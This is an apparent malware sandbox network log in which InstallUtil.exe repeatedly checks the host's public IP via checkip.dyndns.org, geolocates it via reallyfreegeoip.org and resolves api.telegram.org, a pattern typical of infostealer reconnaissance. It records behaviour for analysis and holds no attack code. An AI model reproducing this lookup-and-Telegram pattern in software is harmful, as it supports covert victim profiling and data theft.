                                                                                                                                                                                              Jan 10, 2025 09:29:24.934226990 CET1.1.1.1192.168.2.40x5cbeNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:24.934226990 CET1.1.1.1192.168.2.40x5cbeNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:24.934226990 CET1.1.1.1192.168.2.40x5cbeNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:24.934226990 CET1.1.1.1192.168.2.40x5cbeNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:24.934226990 CET1.1.1.1192.168.2.40x5cbeNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:24.934226990 CET1.1.1.1192.168.2.40x5cbeNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                              Jan 10, 2025 09:29:28.916146994 CET1.1.1.1192.168.2.40x9f70No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49871 | 193.122.130.0 | 80 | 7968 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 09:29:19.148757935 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 09:29:19.612875938 CET | 321 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 08:29:19 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 9906273f056d04b489c61b9b3da4e0e7
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 09:29:19.617446899 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 09:29:19.720211983 CET | 321 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 08:29:19 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: d5e8d634c3cf3e4e1859103b09b9fb8e
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 09:29:20.445688009 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 09:29:20.550591946 CET | 321 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 08:29:20 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 5a6eacecf33eb67b44e0bd372e351ce3
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49885 | 193.122.130.0 | 80 | 7968 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 09:29:21.150393009 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 09:29:21.606020927 CET | 321 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 08:29:21 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 57a60bdf6c61206d7207e56e2d571ef9
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49893 | 193.122.130.0 | 80 | 7968 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 09:29:22.249783993 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 09:29:22.717125893 CET | 321 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 08:29:22 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 93bf70f77c3cd8128a34fd15202c7856
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49901 | 193.122.130.0 | 80 | 7968 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 09:29:23.344961882 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 09:29:23.844273090 CET | 321 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 08:29:23 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: a280bc7f61095c1dfd306dc3e92ce763
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49912 | 193.122.130.0 | 80 | 7968 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 09:29:24.467472076 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 09:29:24.924742937 CET | 321 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 08:29:24 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 87f789c27942235ed1c42a9afc5549ef
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49918 | Destination IP: 193.122.130.0 | Destination Port: 80 | PID: 7968 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp: Jan 10, 2025 09:29:25.590614080 CET | Bytes transferred: 151 | Direction: OUT
Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Jan 10, 2025 09:29:26.044668913 CET | Bytes transferred: 321 | Direction: IN
Data:
HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 08:29:26 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 94f5e251077dc64c32a79815cd9d6cb7
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49927 | Destination IP: 193.122.130.0 | Destination Port: 80 | PID: 7968 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp: Jan 10, 2025 09:29:26.666353941 CET | Bytes transferred: 151 | Direction: OUT
Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Jan 10, 2025 09:29:27.178261995 CET | Bytes transferred: 321 | Direction: IN
Data:
HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 08:29:27 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 82662a81eec261f809f7a1cb3969ff01
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49936 | Destination IP: 193.122.130.0 | Destination Port: 80 | PID: 7968 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp: Jan 10, 2025 09:29:27.818296909 CET | Bytes transferred: 151 | Direction: OUT
Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Jan 10, 2025 09:29:28.276055098 CET | Bytes transferred: 321 | Direction: IN
Data:
HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 08:29:28 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 962ad32921e7667112cced4e851326e4
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 0 | Source IP: 192.168.2.4 | Source Port: 49877 | Destination IP: 104.21.48.14 | Destination Port: 443 | PID: 7968 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp: 2025-01-10 08:29:20 UTC | Bytes transferred: 85 | Direction: OUT
Data:
GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive

Timestamp: 2025-01-10 08:29:20 UTC | Bytes transferred: 860 | Direction: IN
Data:
HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 08:29:20 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1812549
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zzHadVjRJ6dfj3a%2F2NHqxHoIah6y%2F8b%2FWK41cjeuV3mRklu2I0ckIZZDYyoe1%2FDKpyrj8iCdb8Cfw7j31I0iNiV%2BNaaDrSNnh%2BXL1N3pBXUBQd6e8rT854W3Og074DADoyBesqKy"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffb4c7a5b748cda-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1931&min_rtt=1931&rtt_var=965&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4238&recv_bytes=699&delivery_rate=363953&cwnd=243&unsent_bytes=0&cid=8681a09a244e283e&ts=190&x=0"

Timestamp: 2025-01-10 08:29:20 UTC | Bytes transferred: 362 | Direction: IN
Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 1 | Source IP: 192.168.2.4 | Source Port: 49882 | Destination IP: 104.21.48.14 | Destination Port: 443 | PID: 7968 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp: 2025-01-10 08:29:21 UTC | Bytes transferred: 61 | Direction: OUT
Data:
GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org

Timestamp: 2025-01-10 08:29:21 UTC | Bytes transferred: 861 | Direction: IN
Data:
HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 08:29:21 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1812550
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D7Siote%2FLgrxtZlEQ%2FxPDxKUGNnVIOoKVNHzLFpxZzrxDuw5IJ%2FDrkkyoN%2BjK1QcaSTvZhGhyJoAu7TBKk%2BFNHzyuz6dnqLnyo3%2Bjd9YB5ODVtZk0VqQVGRoVpTzK4Fko3HY99b7"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffb4c7ec8ef8c15-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1780&min_rtt=1775&rtt_var=676&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1607044&cwnd=238&unsent_bytes=0&cid=b5f5086ad3b5166d&ts=133&x=0"

Timestamp: 2025-01-10 08:29:21 UTC | Bytes transferred: 362 | Direction: IN
Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 2 | Source IP: 192.168.2.4 | Source Port: 49888 | Destination IP: 104.21.48.14 | Destination Port: 443 | PID: 7968 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp: 2025-01-10 08:29:22 UTC | Bytes transferred: 85 | Direction: OUT
Data:
GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive

Timestamp: 2025-01-10 08:29:22 UTC | Bytes transferred: 863 | Direction: IN
Data:
HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 08:29:22 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1812551
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DBbd%2Ftk0pff2r%2BMTopqiWyMSBbSTBrjlaE0ONIiVZ0RK%2FFU7IASoEKdPJ8lq5%2BNkNH4GpZtc7h5O%2FQWX52igcL7%2BTv%2BksxPeaxLdnXyPO8cvRhIWvVP8lfJu36qBbKhVw3sVLfV6"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffb4c857cadc461-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1659&rtt_var=629&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1760096&cwnd=228&unsent_bytes=0&cid=c50c76d71eed2c00&ts=139&x=0"

Timestamp: 2025-01-10 08:29:22 UTC | Bytes transferred: 362 | Direction: IN
Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
3          | 192.168.2.4 | 49898       | 104.21.48.1    | 443              | 7968 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp               | Bytes transferred | Direction | Data
2025-01-10 08:29:23 UTC | 85                | OUT       | GET /xml/8.46.123.189 HTTP/1.1
                        |                   |           | Host: reallyfreegeoip.org
                        |                   |           | Connection: Keep-Alive
2025-01-10 08:29:23 UTC | 855               | IN        | HTTP/1.1 200 OK
                        |                   |           | Date: Fri, 10 Jan 2025 08:29:23 GMT
                        |                   |           | Content-Type: text/xml
                        |                   |           | Content-Length: 362
                        |                   |           | Connection: close
                        |                   |           | Age: 1812552
                        |                   |           | Cache-Control: max-age=31536000
                        |                   |           | cf-cache-status: HIT
                        |                   |           | last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                        |                   |           | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jAm6ZuBj1uJ2MR0c2lN%2B5WDNG2QSd2DCEThuVRdH3XFp4eY5SB3FXKpaiTQrZtkPaLhMfoDWz2T%2BwbMWlN4jl1v7upBKIMSqyW9Br2hZBFUrjAt5TWgzHsWaOo2JeFBf%2FuYwsvkx"}],"group":"cf-nel","max_age":604800}
                        |                   |           | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        |                   |           | Server: cloudflare
                        |                   |           | CF-RAY: 8ffb4c8c7f4142e9-EWR
                        |                   |           | alt-svc: h3=":443"; ma=86400
                        |                   |           | server-timing: cfL4;desc="?proto=TCP&rtt=1764&min_rtt=1764&rtt_var=661&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1655328&cwnd=240&unsent_bytes=0&cid=8cb8f69b41121566&ts=156&x=0"
2025-01-10 08:29:23 UTC | 362               | IN        | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                        |                   |           | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
4          | 192.168.2.4 | 49906       | 104.21.48.1    | 443              | 7968 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp               | Bytes transferred | Direction | Data
2025-01-10 08:29:24 UTC | 61                | OUT       | GET /xml/8.46.123.189 HTTP/1.1
                        |                   |           | Host: reallyfreegeoip.org
2025-01-10 08:29:24 UTC | 851               | IN        | HTTP/1.1 200 OK
                        |                   |           | Date: Fri, 10 Jan 2025 08:29:24 GMT
                        |                   |           | Content-Type: text/xml
                        |                   |           | Content-Length: 362
                        |                   |           | Connection: close
                        |                   |           | Age: 1812553
                        |                   |           | Cache-Control: max-age=31536000
                        |                   |           | cf-cache-status: HIT
                        |                   |           | last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                        |                   |           | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4423E0SF0HGy3CO6o1WBYriuA8SVLc3i2ggyATAVeP9XnjzTKd9fNAizeNOsvyoVq4yRHYwDzOWdxnlCLFvZ8MZ0rRTSKHHXTiTTyBrqsVL3wFLHmB%2BIEInpXiTHxqrRb1ksJ9fT"}],"group":"cf-nel","max_age":604800}
                        |                   |           | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        |                   |           | Server: cloudflare
                        |                   |           | CF-RAY: 8ffb4c938cd3c323-EWR
                        |                   |           | alt-svc: h3=":443"; ma=86400
                        |                   |           | server-timing: cfL4;desc="?proto=TCP&rtt=1489&min_rtt=1479&rtt_var=575&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1869398&cwnd=214&unsent_bytes=0&cid=dea834735a5909bc&ts=154&x=0"
